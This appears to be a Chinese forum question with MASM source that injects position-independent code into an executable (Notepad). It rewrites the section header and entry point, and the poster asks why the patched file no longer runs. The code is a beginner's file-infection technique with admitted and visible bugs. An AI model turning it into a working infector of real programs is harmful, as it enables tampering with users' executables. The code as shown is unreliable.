.386
.model flat,stdcall
option casemap:none

include include\windows.inc
include include\kernel32.inc
include include\user32.inc
includelib lib\kernel32.lib
includelib lib\user32.lib

.data
hFile dd 0
szCaption db "test",0
szMessage db "success",0
szMessage1 db "fail",0
szFileName db "test.exe",0
szUser32 db "user32.dll",0
szApiName db "MessageBoxA",0

.code
_main:
  push 02h
  push offset szFileName  \\该文件就是记事本
  call _lopen
  mov hFile,eax
  
  sub esp,1000h
  mov edi,esp

  push 1000h
  push edi
  push hFile
  call _lread

  mov eax,[edi+3ch]
  add edi,eax
  mov ebx,edi
  add ebx,sizeof IMAGE_NT_HEADERS
  assume ebx:ptr IMAGE_SECTION_HEADER,edi:ptr IMAGE_NT_HEADERS

  mov [ebx].Characteristics,0f0000020h  
  mov eax,[ebx].Misc.VirtualSize
  mov ecx,eax
  add ecx,[ebx].VirtualAddress
  mov [edi].OptionalHeader.AddressOfEntryPoint,ecx
  add [ebx].Misc.VirtualSize,offset _m2-offset _m1
  add eax,[ebx].PointerToRawData

  push FILE_BEGIN
  push eax
  push hFile
  call _llseek
  push offset _m2-offset _m1
  push offset _m1
  push hFile
  call _lwrite
  push FILE_BEGIN
  push 0
  push hFile
  call _llseek
  push 1000h
  push esp
  push hFile
  call _lwrite
  add esp,1000h
  
  push offset szUser32
  call LoadLibraryA
  push offset szApiName
  push eax
  call GetProcAddress
  mov aMessageBoxA,eax

  push MB_OK or MB_ICONINFORMATION
  push offset szCaption
  push offset szMessage
  push 0
  call MessageBoxA

  ret

_m1:
  call _r
_r:
  pop ebp
  sub ebp,offset _r

  push MB_OK or MB_ICONINFORMATION
  lea eax,szMsg2[ebp]
  push eax
  lea eax,szMsg1[ebp]
  push eax
  push 0
  call aMessageBoxA[ebp]
  ret
  
  aMessageBoxA dd 0
  szMsg1 db "你确定要退出么？",0
  szMsg2 db "出错",0
_m2:

end _main

把后面的部分代码注入记事本后，记事本显示不是WIN32程序。请问错在哪里，刚学，估计很多错误，主要想知道是不是节表的数据填错了还是什么。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课